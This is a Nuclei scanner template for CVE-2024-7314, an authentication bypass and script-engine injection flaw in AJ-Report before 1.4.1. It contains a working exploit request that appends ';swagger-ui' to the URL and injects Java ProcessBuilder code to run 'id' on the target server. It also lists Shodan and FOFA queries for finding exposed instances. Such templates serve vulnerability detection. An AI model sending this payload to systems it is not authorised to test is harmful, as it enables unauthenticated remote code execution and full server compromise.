id: CVE-2024-7314

info:
  name: AJ-Report < 1.4.1 - Remote Code Execution
  author: ritikchaddha
  severity: critical
  description: |
    AJ-Report before version 1.4.1 is affected by an authentication bypass vulnerability. A remote and unauthenticated attacker can append ";swagger-ui" to HTTP requests to bypass authentication and execute arbitrary Java code on the victim server through script engine injection in the validation rules functionality.
  impact: |
    Unauthenticated attackers can bypass authentication and execute arbitrary Java code on the server through script engine injection, achieving complete system compromise and access to all application data.
  remediation: |
    Upgrade to AJ-Report version 1.4.1 or later which includes security fixes.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/aj-report/CNVD-2024-15077
    - https://github.com/yuebusao/AJ-REPORT-EXPLOIT
    - https://xz.aliyun.com/t/14460
    - https://nvd.nist.gov/vuln/detail/CVE-2024-7314
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-280
    epss-score: 0.74583
    epss-percentile: 0.9888
    cve-id: CVE-2024-7314
    cpe: cpe:2.3:a:anji-plus:report:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: anji-plus
    product: report
    fofa-query: app="AJ-Report"
    shodan-query: http.title:"AJ-Report"
  tags: cve,cve2024,aj-report,anji-plus,rce,swagger,vkev,vuln

http:
  - raw:
      - |
        POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json;charset=UTF-8

        {"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
          - 'data":'
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        regex:
          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
# digest: 4b0a0048304602210094c4a3e99571d9196bacb4ef10788b25673a6a4d87c13635b7564e40184c10bf0221009f129f4451a7e6e3c6af69e89e11f1be29147dd64cbe3f58f646c3d1c159994e:922c64590222798bb761d5b6d8e72950